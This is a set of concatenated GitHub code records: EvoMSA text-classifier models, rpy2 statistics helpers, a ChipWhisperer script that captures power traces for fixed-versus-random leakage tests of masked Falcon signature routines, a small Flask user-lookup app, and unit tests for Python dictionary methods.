>>> s = SVCWrapper()\n >>> s._m.dual\n False\n \"\"\"\n def __init__(self, *args, dual=False, **kwargs):\n self._m = LinearSVC(*args, dual=dual, **kwargs)\n\n def fit(self, X, y):\n return self._m.fit(X, y)\n\n def predict(self, X):\n return self._m.predict(X)\n\n def decision_function(self, X):\n return self._m.decision_function(X)\n\nclass Identity(BaseTextModel, BaseClassifier):\n \"\"\"Identity function used as either text model or classifier or regressor\"\"\"\n\n def __getitem__(self, x):\n return x\n\n def fit(self, X, y=None):\n return self\n\n def decision_function(self, X):\n try:\n return X.toarray()\n except AttributeError:\n return X\n\n def predict_proba(self, X):\n return self.decision_function(X)\n\n\nclass LabeledDataSet(BaseTextModel, BaseClassifier):\n \"\"\"Create a text classifier using b4msa.textmodel.TextModel and LinearSVC\n\n :param docs: do not use\n :type docs: None\n :param textModel: text model e.g., b4msa.textmodel.TextModel\n :param coef: coefficients obtained from LinearSVC\n :type coef: array\n :param intercept: bias obtained from LinearSVC\n :type intercept: array\n :param labels: list of labels or classes\n :type labels: list\n \"\"\"\n def __init__(self, docs=None, textModel=None, coef=None, intercept=None, labels=None):\n assert docs is None\n self._textModel = textModel\n self._coef = coef\n self._intercept = intercept\n self._labels = labels\n self._text = os.getenv('TEXT', default='text')\n\n @property\n def textModel(self):\n from .cython_utils import TextModelPredict\n try:\n return self._textModelPredict\n except AttributeError:\n self._textModelPredict = TextModelPredict(self._textModel,\n self._coef,\n self._intercept)\n return self._textModelPredict\n\n def __getstate__(self):\n \"\"\"Remove attributes before the pickle\"\"\"\n\n r = self.__dict__.copy()\n try:\n del r['_textModelPredict']\n except KeyError:\n pass\n return r\n\n def fit(self, X, y=None):\n return self\n\n def get_text(self, text):\n key = self._text\n if isinstance(text, 
(list, tuple)):\n return \" | \".join([x[key] for x in text])\n elif isinstance(text, str):\n return text\n return text[key]\n\n def decision_function(self, X):\n return self.transform(X)\n\n def predict_proba(self, X):\n return self.decision_function(X)\n\n def transform(self, X):\n output = []\n self.textModel.transform([self.get_text(x) for x in X], output)\n return np.array(output)\n\n def __getitem__(self, x):\n return np.array(self.textModel[self.get_text(x)])\n\n @classmethod\n def _create_space(cls, fname, **kwargs):\n \"\"\"Create the space from a file of json\n\n :param fname: Path to the file containing the json\n :type fname: str\n :param kwargs: Keywords passed to TextModel\n \"\"\"\n import random\n from .utils import linearSVC_array\n from collections import Counter\n try:\n from tqdm import tqdm\n except ImportError:\n def tqdm(x, **kwargs):\n return x\n\n data = [x for x in tweet_iterator(fname)]\n random.shuffle(data)\n tm = TextModel(**kwargs).fit([x['text'] for x in data[:128000]])\n tm._num_terms = tm.model.num_terms\n # klass, nele = np.unique([x['klass'] for x in data], return_counts=True)\n _ = [(k, v) for k, v in Counter([x['klass'] for x in data]).items()]\n _.sort(key=lambda x: x[0])\n klass = [x[0] for x in _]\n nele = [x[1] for x in _]\n h = {v: k for k, v in enumerate(klass)}\n MODELS = []\n for ident, k in tqdm(enumerate(klass)):\n elepklass = [0 for __ in klass]\n cnt = nele[ident]\n cntpklass = int(cnt / (len(klass) - 1))\n D = [(x, 1) for x in data if x['klass'] == k]\n for x in data:\n if x['klass'] == k:\n continue\n if elepklass[h[x['klass']]] > cntpklass:\n continue\n elepklass[h[x['klass']]] = elepklass[h[x['klass']]] + 1\n D.append((x, -1))\n m = LinearSVC().fit(tm.tonp([tm[x[0]['text']] for x in D]), [x[1] for x in D])\n MODELS.append(m)\n coef, intercept = linearSVC_array(MODELS)\n return tm, coef, intercept, klass\n\n @classmethod\n def create_space(cls, fname, output=None, **kwargs):\n \"\"\"Create the space from a file of json\n\n :param fname: Path to the file containing the json\n :type fname: str\n :param output: Path to store the model, it is cls.model_fname if None\n :type output: str\n :param kwargs: Keywords passed to TextModel\n \"\"\"\n tm, coef, intercept, klass = cls._create_space(fname, **kwargs)\n if output is None:\n output = cls.model_fname()\n ins = cls(textModel=tm, coef=coef, intercept=intercept, labels=klass)\n save_model(ins, output)\n\n\nclass Corpus(BaseTextModel, SparseMatrix):\n \"\"\"Text model using only words\"\"\"\n\n def __init__(self, corpus=None, **kwargs):\n self._text = os.getenv('TEXT', default='text')\n self._m = {}\n self._num_terms = 0\n self._training = True\n self._textModel = TextModel(token_list=[-1])\n if corpus is not None:\n self.fit(corpus)\n\n def get_text(self, text):\n return text[self._text]\n\n def fit(self, c):\n [self.__getitem__(x) for x in c]\n self._training = False\n return self\n\n @property\n def num_terms(self):\n return self._num_terms\n\n def tokenize(self, text):\n if isinstance(text, dict):\n text = self.get_text(text)\n if isinstance(text, (list, tuple)):\n tokens = []\n for _text in text:\n tokens.extend(self._textModel.tokenize(_text))\n return tokens\n else:\n return self._textModel.tokenize(text)\n\n def transform(self, texts):\n \"\"\"Convert texts into vectors\n\n :param texts: List of text to be transformed\n :type texts: list\n\n :rtype: list\n\n Example:\n\n >>> from microtc.textmodel import TextModel\n >>> corpus = ['buenos dias catedras', 'catedras conacyt']\n >>> textmodel = 
TextModel().fit(corpus)\n >>> X = textmodel.transform(corpus)\n \"\"\"\n return self.tonp([self.__getitem__(x) for x in texts])\n\n def __getitem__(self, d):\n tokens = []\n for t in self.tokenize(d):\n try:\n index, k = self._m[t]\n if self._training:\n self._m[t] = [index, k+1]\n except KeyError:\n if not self._training:\n continue\n index, k = self._num_terms, 1\n self._m[t] = [index, k]\n self._num_terms += 1\n tokens.append([index, k])\n return tokens\n\n\nclass AggressivenessAr(Corpus):\n \"\"\"Arabic text model using an aggressive corpus\"\"\"\n\n def __init__(self, *args, **kwargs):\n fname = os.path.join(os.path.dirname(__file__), 'conf',\n 'aggressiveness.ar')\n corpus = []\n for x in tweet_iterator(fname):\n corpus += x['words']\n super(AggressivenessAr, self).__init__(corpus)\n\n\nclass AggressivenessEn(Corpus):\n \"\"\"English text model using an aggressive corpus\"\"\"\n\n def __init__(self, *args, **kwargs):\n fname = os.path.join(os.path.dirname(__file__), 'conf',\n 'aggressiveness.en')\n corpus = []\n for x in tweet_iterator(fname):\n corpus += x['words']\n super(AggressivenessEn, self).__init__(corpus)\n\n\nclass AggressivenessEs(Corpus):\n \"\"\"Spanish text model using an aggressive corpus\"\"\"\n\n def __init__(self, *args, **kwargs):\n fname = os.path.join(os.path.dirname(__file__), 'conf',\n 'aggressiveness.es')\n corpus = []\n for x in tweet_iterator(fname):\n corpus += x['words']\n super(AggressivenessEs, self).__init__(corpus)\n\n\nclass Bernoulli(BaseClassifier):\n \"\"\"Bernoulli classifier\"\"\"\n\n def __init__(self, random_state=0):\n self._num_terms = -1\n\n @property\n def num_terms(self):\n return self._num_terms\n\n def fit(self, X, klass):\n self._num_terms = X.shape[1]\n klasses, prior = np.unique(klass, return_counts=True)\n self._prior = np.log(prior / prior.sum())\n pr = np.zeros((klasses.shape[0], self.num_terms))\n for i, k in zip(X, klass):\n index = i.indices\n if index.shape[0] > 0:\n pr[k, index] += 1\n pr = np.array([(x + 1) / ((klass == i).sum() + 2)\n for x, i in zip(pr, klasses)])\n self._wj = np.log(pr)\n self._vj = np.log(1 - pr)\n return self\n\n def predict(self, X):\n return np.argmax(self.decision_function_raw(X), axis=1)\n\n def decision_function(self, X):\n _ = self.predict_proba(X)\n df = _ * 2 - 1\n df[df > 1] = 1\n df[df < -1] = -1\n return df\n\n def predict_proba(self, X):\n X = self.decision_function_raw(X)\n return np.exp(X)\n\n def decision_function_raw(self, X):\n wj = self._wj\n vj = self._vj\n hy = []\n prior = self._prior\n x = np.zeros(self.num_terms)\n for d in X:\n x.fill(0)\n index = d.indices\n if index.shape[0] > 0:\n x[index] = 1\n _ = ((x * wj) + (1 - x) * vj).sum(axis=1) + prior\n hy.append(_)\n hy = np.array(hy)\n hy = hy - np.atleast_2d(logsumexp(hy, axis=1)).T\n return hy\n\n\nclass Multinomial(Bernoulli):\n \"\"\"Multinomial classifier\"\"\"\n\n def fit(self, X, klass):\n self._num_terms = X.shape[1]\n klasses = np.unique(klass)\n pr = np.zeros((klasses.shape[0], self.num_terms))\n for i, k in zip(X, klass):\n index = i.indices\n if index.shape[0] > 0:\n pr[k, index] += 1\n den = pr.sum(axis=1)\n self._log_xj = np.log((1 + pr) / np.atleast_2d(self.num_terms + den).T)\n return self\n\n def decision_function_raw(self, X):\n xj = self._log_xj\n hy = []\n for d in X:\n x = np.zeros(self.num_terms)\n index = d.indices\n if index.shape[0] > 0:\n x[index] = 1\n _ = (xj * x).sum(axis=1)\n hy.append(_)\n return np.array(hy)\n\n\nclass ThumbsUpDownEs(ThumbsUpDown):\n \"\"\"Spanish thumbs up and down model\"\"\"\n\n 
def __init__(self, *args, **kwargs):\n super(ThumbsUpDownEs, self).__init__(lang=_SPANISH, stemming=False)\n\n def fit(self, X):\n return self\n\n def transform(self, X):\n return np.array([self.__getitem__(x) for x in X])\n\n\nclass ThumbsUpDownEn(ThumbsUpDown):\n \"\"\"English thumbs up and down model\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ThumbsUpDownEn, self).__init__(lang=_ENGLISH, stemming=False)\n\n def fit(self, X):\n return self\n\n def transform(self, X):\n return np.array([self.__getitem__(x) for x in X])\n\n\nclass ThumbsUpDownAr(ThumbsUpDown):\n \"\"\"Arabic thumbs up and down model\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ThumbsUpDownAr, self).__init__(lang=_ARABIC, stemming=False)\n\n def fit(self, X):\n return self\n\n def transform(self, X):\n return np.array([self.__getitem__(x) for x in X])\n\n\nclass Vec(BaseTextModel):\n \"\"\"Read the key vec, useful to incorporate external knowledge as FastText print-sentence-vectors\"\"\"\n\n def __getitem__(self, x):\n return x['vec']\n\n def fit(self, X):\n return self\n\n\nclass TextModelInv(TextModel):\n \"\"\"Extends :mod:`b4msa.textmodel.TextModel` in order to override tokenize method.\"\"\"\n \n def __init__(self, is_by_character: bool=True, **kwargs):\n \"\"\"\n :param is_by_character: if true, inverts the text character by character; if false, inverts word by word \n :type is_by_character: bool\n \"\"\"\n \n super(TextModelInv, self).__init__(**kwargs)\n self.is_by_character = is_by_character\n \n def tokenize(self, text: Union[str, dict]):\n \"\"\"Inverts text\n\n :param text: Text\n :type text: str\n \"\"\"\n if isinstance(text, dict):\n text = self.get_text(text)\n\n if self.is_by_character:\n result = text[::-1]\n else:\n result = text.split(' ')\n result.reverse()\n result = \" \".join(result) \n \n return super(TextModelInv, self).tokenize(result)\n\n\nclass GaussianBayes(object):\n \"\"\"\n >>> from scipy.stats import multivariate_normal\n >>> from EvoMSA.model import GaussianBayes \n >>> X_1 = multivariate_normal(mean=[5, 5], cov=[[4, 0], [0, 2]]).rvs(size=1000)\n >>> X_2 = multivariate_normal(mean=[1.5, -1.5], cov=[[2, 1], [1, 3]]).rvs(size=1000)\n >>> X_3 = multivariate_normal(mean=[12.5, -3.5], cov=[[2, 3], [3, 7]]).rvs(size=1000)\n >>> X = np.concatenate((X_1, X_2, X_3))\n >>> y = np.array([1] * 1000 + [2] * 1000 + [3] * 1000)\n >>> bayes = GaussianBayes().fit(X, y)\n >>> hy = bayes.predict(X)\n >>> bayes = GaussianBayes(naive=True).fit(X, y)\n >>> hy_naive = bayes.predict(X)\n \"\"\"\n def __init__(self, naive=False) -> None:\n self._naive = naive\n\n @property\n def naive(self):\n return self._naive\n \n @property\n def labels(self):\n return self._labels\n\n @labels.setter\n def labels(self, labels):\n self._labels = labels\n\n @property\n def prior(self):\n return self._prior\n\n @prior.setter\n def prior(self, y):\n labels, counts = np.unique(y, return_counts=True)\n prior = counts / counts.sum() \n self.labels = labels\n self._prior = np.log(prior)\n\n @property\n def likelihood(self):\n return self._likelihood\n\n @likelihood.setter\n def likelihood(self, D):\n X, y = D\n likelihood = []\n for k in self.labels:\n mask = y == k\n mu = np.mean(X[mask], axis=0)\n if self.naive:\n cov = np.var(X[mask], axis=0, ddof=1)\n else:\n cov = np.cov(X[mask], rowvar=False)\n _ = multivariate_normal(mean=mu, cov=cov, allow_singular=True)\n likelihood.append(_)\n self._likelihood = likelihood\n\n def fit(self, X, y):\n self.prior = y\n self.likelihood = (X, y)\n return self\n\n def 
predict_log_proba(self, X):\n        log_likelihood = np.vstack([m.logpdf(X) for m in self.likelihood]).T\n        prior = self.prior\n        posterior = log_likelihood + prior\n        evidence = np.atleast_2d(logsumexp(posterior, axis=1)).T\n        return posterior - evidence\n\n    def predict_proba(self, X):\n        _ = self.predict_log_proba(X)\n        return np.exp(_)\n\n    def predict(self, X):\n        hy = self.predict_log_proba(X)\n        _ = np.argmax(hy, axis=1)\n        return self.labels[_]","repo_name":"INGEOTEC/EvoMSA","sub_path":"EvoMSA/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":18413,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"8024857304","text":"from rpy2.rinterface._rinterface import RRuntimeError\nfrom rpy2.robjects.packages import importr, data\nfrom rpy2.robjects import Formula, r\nfrom rpy2.robjects import StrVector, Vector\nimport re\nfrom rpy2.robjects import pandas2ri\nfrom rpy2.robjects.pandas2ri import ri2py as r2p\nfrom rpy2.robjects.pandas2ri import py2ri as p2r\n\n\npandas2ri.activate()\n\nsource = r.source\n\nbase = importr('base')\nc = base.c\n\n\ndef formula(f_str, df=None, **variables):\n    assert not (df is not None and variables)\n    fm = Formula(f_str)\n    env = fm.environment\n    if df is not None:\n        variables = {\n            name: df[name]\n            for name in re.split('\\W+', f_str)\n        }\n    for name, var in variables.items():\n        if name not in f_str:\n            raise ValueError(f'Variable {name} not used in {f_str}')\n        env[name] = var\n    return fm\n\n\nclass G:\n    def __init__(self, plot):\n        ggplot2 = importr(\"ggplot2\")\n        self.plot = plot\n        self.add = ggplot2._env['%+%']\n\n    def __add__(self, other):\n        return G(self.add(self.plot, other))\n\n\ndef data_frame_from_matrix(matrix):\n    from pandas import DataFrame\n    import numpy as np\n\n    rows_names = list(matrix.names[0])\n    columns_names = list(matrix.names[1])\n\n    return DataFrame(\n        data=np.array(matrix),\n        columns=columns_names,\n        index=rows_names\n    )\n\nfrom rpy2.rinterface import RNULLType\n\ndef one_or_all(x):\n    try:\n        if len(x) == 1:\n            return x[0]\n    except TypeError:\n        pass\n    return x\n\n\ndef r_test(test_name):\n    def run_r_test(x, y, **kwargs):\n        if len(x) < 2 or len(y) < 2:\n            return {'p.value': 1}\n        from pandas import Series\n        try:\n            result = r[test_name](p2r(Series(x)), p2r(Series(y)), **kwargs)\n        except RRuntimeError:\n            print(x)\n            print(y)\n            print(kwargs)\n            raise\n        return {\n            key: one_or_all(value)\n            for key, value in result.items()\n        }\n    run_r_test.__name__ = test_name  # assignment, not a no-op comparison\n    return run_r_test\n\nks_test = r_test('ks.test')\nwilcox_test = r_test('wilcox.test')\n\n\ndef r_ks_test(x, y, **kwargs):\n    if len(x) < 2 or len(y) < 2:\n        return {'p.value': 1}\n    from pandas import Series\n    try:\n        result = r['ks.test'](p2r(Series(x)), p2r(Series(y)), **kwargs)\n    except RRuntimeError:\n        print(x)\n        print(y)\n        print(kwargs)\n        raise\n    return {\n        key: one_or_all(value)\n        for key, value in result.items()\n    }\n","repo_name":"krassowski/drug-disease-profile-matching","sub_path":"helpers/r.py","file_name":"r.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"}
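A quick usage sketch for the `r_test` factory in the record above (hedged: the sample vectors are made up, and it assumes rpy2 plus an R installation are available, as the record's imports already require):

    ks = r_test('ks.test')                         # wraps R's ks.test
    res = ks([1.2, 3.4, 2.2, 5.0], [1.0, 2.9, 3.3, 0.7])
    print(res['p.value'])                          # a scalar, thanks to one_or_all()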
+{"seq_id":"17450482900","text":"import chipwhisperer as cw\nimport os\nfrom chipwhisperer.capture.api.programmers import STM32FProgrammer\nimport time\nimport struct\nfrom random import SystemRandom\nimport json\nimport numpy as np\nfrom json import JSONEncoder\n\ntry:\n    if not scope.connectStatus:\n        scope.con()\nexcept NameError:\n    scope = cw.scope()\n\nscope.default_setup()\n\ntry:\n    target = cw.target(scope)\nexcept:\n    print(\"INFO: Caught exception on reconnecting to target - attempting to reconnect to scope first.\")\n    print(\"INFO: This is a work-around when USB has died without Python knowing. Ignore errors above this line.\")\n    scope = cw.scope()\n    target = cw.target(scope)\n\nprint(\"INFO: Found ChipWhisperer\")\n\nprogram = STM32FProgrammer\n\ndir = os.path.dirname(os.path.realpath(__file__))\nprogram_hex_path = os.path.join(dir, r\"main.hex\") #Update accordingly\n\ncw.program_target(scope, program, program_hex_path)\n\ncryptogen = SystemRandom()\n\ndef write_fpr(fpr):\n    val_bytes = fpr.to_bytes(8, byteorder=\"little\", signed=False)\n    data_arr = [len(val_bytes)] + list(val_bytes)\n    data = bytearray(data_arr)\n\n    target.write(data)\n\ndef write_float(f):\n    val_bytes = bytearray(struct.pack(\"d\", f))\n    data_arr = [len(val_bytes)] + list(val_bytes)\n    data = bytearray(data_arr)\n\n    target.write(data)\n\ndef calc_avg_trace(traces):\n    avg_trace = []\n\n    for i in range(len(traces[0])):\n        avg = 0\n\n        for j in range(len(traces)):\n            avg += traces[j][i]\n\n        avg = avg / len(traces)\n\n        avg_trace.append(avg)\n\n    return avg_trace\n\ndef do_write_test():\n    for _ in range(10):\n        test_val = 123456\n        val_bytes = test_val.to_bytes(8, byteorder=\"little\", signed=False)\n        data_arr = [len(val_bytes)] + list(val_bytes)\n        data = bytearray(data_arr)\n\n        target.write(data)\n\n        time.sleep(1)\n\n        returned_data = target.read()\n        returned_bytes = bytearray(returned_data, \"latin1\")\n        returned_val = int.from_bytes(returned_bytes, byteorder=\"little\", signed=False)\n\n        print(returned_val)\n\nclass NumpyArrayEncoder(JSONEncoder):\n    def default(self, obj):\n        if isinstance(obj, np.ndarray):\n            return obj.tolist()\n        return JSONEncoder.default(self, obj)\n\ndef capture_trace(data):\n    scope.arm()\n    target.flush()\n\n    target.write(data)\n\n    while True:\n        returned_data = target.read()\n        returned_bytes = bytearray(returned_data, \"latin1\")\n\n        if len(returned_bytes) != 0:\n            print(\"Result:\", str(returned_bytes))\n\n            ret = scope.capture()\n\n            if ret:\n                print(\"Error occurred. 
Retrying\")\n return capture_trace(data)\n\n trace = scope.get_last_trace()\n return trace\n\n time.sleep(0.1)\n\ndef do_sign_test(cmd=16, filename=\"sign_tree\", iterations=1000):\n\n scope.clock.adc_src = \"clkgen_x4\"\n scope.adc.decimate = 2\n scope.adc.samples = 95000\n\n traces = {\n \"fix\": [],\n \"rand\": []\n }\n\n time.sleep(1)\n\n for i in range(iterations):\n print(\"Iteration:\", str(i))\n\n # Fixed key\n\n type = 0\n seed = os.urandom(8)\n salt = os.urandom(40)\n data_arr = [cmd] + [type] + [len(seed) + len(salt) + 1] + list(seed) + list(salt)\n data = bytearray(data_arr)\n\n fix_trace = capture_trace(data)\n traces[\"fix\"].append(fix_trace)\n\n # Random key\n type = 1\n seed = os.urandom(8)\n salt = os.urandom(40)\n data_arr = [cmd] + [type] + [len(seed) + len(salt) + 1] + list(seed) + list(salt)\n data = bytearray(data_arr)\n\n rand_trace = capture_trace(data)\n traces[\"rand\"].append(rand_trace)\n\n print(\"**********TEST DONE**********\")\n\n #Write traces to file\n with open(\"new_traces/\" + filename + \"_\" + str(iterations) + \".txt\", \"w\") as filehandle:\n json.dump(traces, filehandle, cls=NumpyArrayEncoder)\n\ndef do_fft_test(type=11, filename=\"fft\", iterations=1000, samples=30000):\n scope.clock.adc_src = \"clkgen_x4\"\n scope.adc.decimate = 2\n scope.adc.samples = samples\n\n traces = {\n \"fix\": [],\n \"rand\": []\n }\n\n offset = 0\n\n for i in range(iterations):\n print(\"Iteration:\", str(i))\n\n #Fixed test\n scope.arm()\n target.flush()\n\n data_arr = [type] + [2] + [0] + [offset]\n data = bytearray(data_arr)\n\n trace = capture_trace(data)\n traces[\"fix\"].append(trace)\n\n #Random test\n scope.arm()\n target.flush()\n\n data_arr = [type] + [2] + [1] + [offset]\n data = bytearray(data_arr)\n\n trace = capture_trace(data)\n traces[\"rand\"].append(trace)\n\n #Write traces to file\n with open(\"new_traces/\" + filename + \"_\" + str(iterations) + \".txt\", \"w\") as filehandle:\n json.dump(traces, filehandle, cls=NumpyArrayEncoder)\n\n print(\"**********TEST DONE**********\")\n\ndef do_sub_test(type=7, filename=\"secure_ursh\", iterations=1000):\n scope.clock.adc_src = \"clkgen_x4\"\n scope.adc.decimate = 2\n scope.adc.samples = 10000\n\n traces = {\n \"fix\": [],\n \"rand\": []\n }\n\n fix_a_val = float(68.20750458284908)\n fix_shift_val = 4\n\n for i in range(iterations):\n print(\"Iteration:\", str(i))\n\n #Fixed test\n fix_a_rand = float(cryptogen.random() * 256 - 128)\n fix_shift_rand = int(cryptogen.random() * 16)\n\n val_bytes = bytearray(struct.pack(\"2d\", fix_a_val, fix_a_rand))\n data_arr = [type] + [len(val_bytes) + 2] + list(val_bytes) + [fix_shift_val] + [fix_shift_rand]\n data = bytearray(data_arr)\n\n trace = capture_trace(data)\n traces[\"fix\"].append(trace)\n\n #Random test\n rand_a_val = float(cryptogen.random() * 256 - 128)\n rand_a_rand = float(cryptogen.random() * 256 - 128)\n\n rand_shift_val = int(cryptogen.random() * 16)\n rand_shift_rand = int(cryptogen.random() * 16)\n\n val_bytes = bytearray(struct.pack(\"2d\", rand_a_val, rand_a_rand))\n data_arr = [type] + [len(val_bytes) + 2] + list(val_bytes) + [rand_shift_val] + [rand_shift_rand]\n data = bytearray(data_arr)\n\n trace = capture_trace(data)\n traces[\"rand\"].append(trace)\n\n #Write traces to file\n with open(\"new_traces/\" + filename + \"_\" + str(iterations) + \".txt\", \"w\") as filehandle:\n json.dump(traces, filehandle, cls=NumpyArrayEncoder)\n\n print(\"**********TEST DONE**********\")\n\ndef do_simple_test(type, filename, iterations=1000):\n 
scope.clock.adc_src = \"clkgen_x4\"\n scope.adc.decimate = 2\n scope.adc.samples = 10000\n\n traces = {\n \"fix\": [],\n \"rand\": []\n }\n\n fix_a_val = float(68.20750458284908)\n fix_b_val = float(-92.93250079435525)\n\n for i in range(iterations):\n print(\"Iteration:\", str(i))\n\n #Fixed test\n fix_a_rand = float(cryptogen.random() * 256 - 128)\n fix_b_rand = float(cryptogen.random() * 256 - 128)\n\n val_bytes = bytearray(struct.pack(\"4d\", fix_a_val, fix_b_val, fix_a_rand, fix_b_rand))\n data_arr = [type] + [len(val_bytes)] + list(val_bytes)\n data = bytearray(data_arr)\n\n trace = capture_trace(data)\n traces[\"fix\"].append(trace)\n\n #Random test\n rand_a_val = float(cryptogen.random() * 256 - 128)\n rand_b_val = float(cryptogen.random() * 256 - 128)\n rand_a_rand = float(cryptogen.random() * 256 - 128)\n rand_b_rand = float(cryptogen.random() * 256 - 128)\n\n val_bytes = bytearray(struct.pack(\"4d\", rand_a_val, rand_b_val, rand_a_rand, rand_b_rand))\n data_arr = [type] + [len(val_bytes)] + list(val_bytes)\n data = bytearray(data_arr)\n\n trace = capture_trace(data)\n traces[\"rand\"].append(trace)\n\n #Write traces to file\n with open(\"new_traces/\" + filename + \"_\" + str(iterations) + \".txt\", \"w\") as filehandle:\n json.dump(traces, filehandle, cls=NumpyArrayEncoder)\n\n print(\"**********TEST DONE**********\")\n\ndef do_all_simple():\n print(\"STARTING ALL SIMPLE TESTS\")\n do_simple_test(1, \"fpr_add_traces\", 1000)\n time.sleep(10)\n do_simple_test(2, \"fpr_add_traces_masked\", 1000)\n time.sleep(10)\n do_simple_test(3, \"fpr_add_traces_masked_deep\", 1000)\n time.sleep(10)\n do_simple_test(4, \"fpr_mul_traces\", 1000)\n time.sleep(10)\n do_simple_test(5, \"fpr_mul_traces_masked\", 1000)\n time.sleep(10)\n do_simple_test(6, \"fpr_mul_traces_masked_deep\", 1000)\n time.sleep(10)\n do_simple_test(1, \"fpr_add_traces\", 10000)\n time.sleep(10)\n do_simple_test(2, \"fpr_add_traces_masked\", 10000)\n time.sleep(10)\n do_simple_test(3, \"fpr_add_traces_masked_deep\", 10000)\n time.sleep(10)\n do_simple_test(4, \"fpr_mul_traces\", 10000)\n time.sleep(10)\n do_simple_test(5, \"fpr_mul_traces_masked\", 10000)\n time.sleep(10)\n do_simple_test(6, \"fpr_mul_traces_masked_deep\", 10000)\n time.sleep(10)\n\ndef test_clock():\n scope.clock.adc_src = \"clkgen_x4\"\n time.sleep(1)\n freq = scope.clock.adc_freq\n print(\"Current frequency\", str(freq))\n srate = scope.clock.adc_rate\n print(\"Current sampling rate:\", str(srate))\n adc_src = scope.clock.adc_src\n print(\"Current adc src\", adc_src)\n\n# do_all_simple()\n# do_write_test()\n# do_fft_trace()\n# do_fpc_mul_masked_test()\n# do_fpr_mul_test()\n# do_fpr_mul_masked_test()\n# do_fpr_add_test()\n# do_sub_test(type=7, filename=\"ursh\", iterations=1000)\n# do_sub_test(type=8, filename=\"secure_ursh\", iterations=1000)\n# do_sub_test(type=9, filename=\"norm\", iterations=1000)\n# do_sub_test(type=10, filename=\"secure_norm\", iterations=1000)\n#\n# do_fft_test(type=11, filename=\"fft\", iterations=1000, samples=20000)\n# do_fft_test(type=12, filename=\"fft_masked\", iterations=1000, samples=30000)\n# do_fft_test(type=13, filename=\"fft_masked_deep\", iterations=1000, samples=95000)\n\n# test_clock()\n\n# do_simple_test(2, \"fpr_add_traces_slow_masked\", 1000)\n\n# do_fft_test(type=14, filename=\"poly_mul_fft\", iterations=1000, samples=20000)\n# do_fft_test(type=15, filename=\"poly_mul_fft_masked\", iterations=1000, samples=30000)\n# do_sign_test(cmd=16, filename=\"ffSamplingLOGN8\", iterations=1000)\n# do_sign_test(cmd=17, 
filename=\"ffSamplingLOGN8_masked\", iterations=1000)","repo_name":"Thomar10/Falcon-signature","sub_path":"chipwhisperer/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":10192,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21641914305","text":"from flask import Flask, render_template\napp = Flask(__name__)\n\n\n@app.route('/user/')\ndef index(username):\n users = {\n \"quan\" : {\n \"name\": \"Nguyen Anh Quan\",\n \"age\": 16,\n \"gender\": \"male\"\n },\n \"tuananh\" : { \n \"name\": \"Huynh Tuan Anh\",\n \"age\": 23,\n \"gender\": \"male\"\n\n },\n \"hathu\": {\n \"name\": \"Nguyen Ha Thu\",\n \"age\": 16,\n \"gender\": \"female\"\n }\n }\n if username in users.keys():\n boo = True\n else:\n boo = False\n \n\n return render_template('ex2.html', alluser = users, username = username, boo = boo)\n\nif __name__ == '__main__':\n app.run(debug=True)\n ","repo_name":"hathu0610/nguyenhathu-fundamental-c4e13","sub_path":"Web01/HW/Serious/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13649698411","text":"\"\"\"\nTesting cases of method and function of DICTIONARY\n\"\"\"\n\nimport random\nfrom libs.create_dict import create_random_dict\nfrom libs.create_set import create_random_set\n\n# =============================================================================\n\n\ndef test_dict_clear():\n \"\"\"\n Test dict_clear():\n - dict == {}\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n\n sample_dict.clear()\n\n assert len(sample_dict) == 0\n\n\n# =============================================================================\n\n\ndef test_dict_copy():\n \"\"\"\n Test dict.copy():\n - dict_copy == dict.copy()\n - dict_copy is not dict\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n\n dict_copy = sample_dict.copy()\n\n assert sample_dict == dict_copy\n assert sample_dict is not dict_copy\n\n\n# =============================================================================\n\n\ndef test_dict_fromkeys():\n \"\"\"\n Test dict.fromkeys(key, value):\n - new_dict == {key_0: value, key_1: value, ...}\n \"\"\"\n num_test = 10\n lower, upper = 0, 1000\n\n for _ in range(num_test):\n keys_dict = create_random_set()\n value = random.randint(lower, upper)\n\n sample_dict = dict.fromkeys(keys_dict, value)\n\n test_val = True\n for k in sample_dict:\n if sample_dict[k] != value:\n test_val = False\n break\n\n assert len(sample_dict) == len(keys_dict)\n assert test_val\n\n\n# =============================================================================\n\n\ndef test_dict_get():\n \"\"\"\n Test dict.get(key, value):\n - key in dict: dict.get(key, value) == dict[key]\n - key not in dict: dict.get(key, value) == value\n \"\"\"\n num_test = 10\n lower, upper = 0, 1000\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n\n key = random.randint(lower, upper)\n value = random.randint(lower, upper)\n\n if key in sample_dict:\n assert sample_dict.get(key, value) == sample_dict[key]\n else:\n assert value == sample_dict.get(key, value)\n\n\n# =============================================================================\n\n\ndef test_dict_items():\n \"\"\"\n Test dict.items():\n - dict_items([(key_0, value_0), (key_1, value_1), ...]) == dict.items()\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n 
sample_dict = create_random_dict()\n\n list_elements = list(sample_dict.items())\n\n test_val = True\n idx = 0\n for k in sample_dict:\n if k != list_elements[idx][0] or sample_dict[k] != list_elements[idx][1]:\n test_val = False\n break\n idx += 1\n\n assert len(list_elements) == len(sample_dict)\n assert test_val\n\n\n# =============================================================================\n\n\ndef test_dict_keys():\n \"\"\"\n Test dict.keys():\n - list(dict.keys()) == list(dict)\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n\n assert list(sample_dict.keys()) == list(sample_dict)\n\n\n# =============================================================================\n\n\ndef test_dict_pop():\n \"\"\"\n Test dict.pop(key):\n - old_dict[key] == dict.pop(key)\n - key not in new_dict\n - new_len == old_len - 1\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n old_len = len(sample_dict)\n\n key = random.choice(list(sample_dict))\n value_test = sample_dict[key]\n\n value_returned = 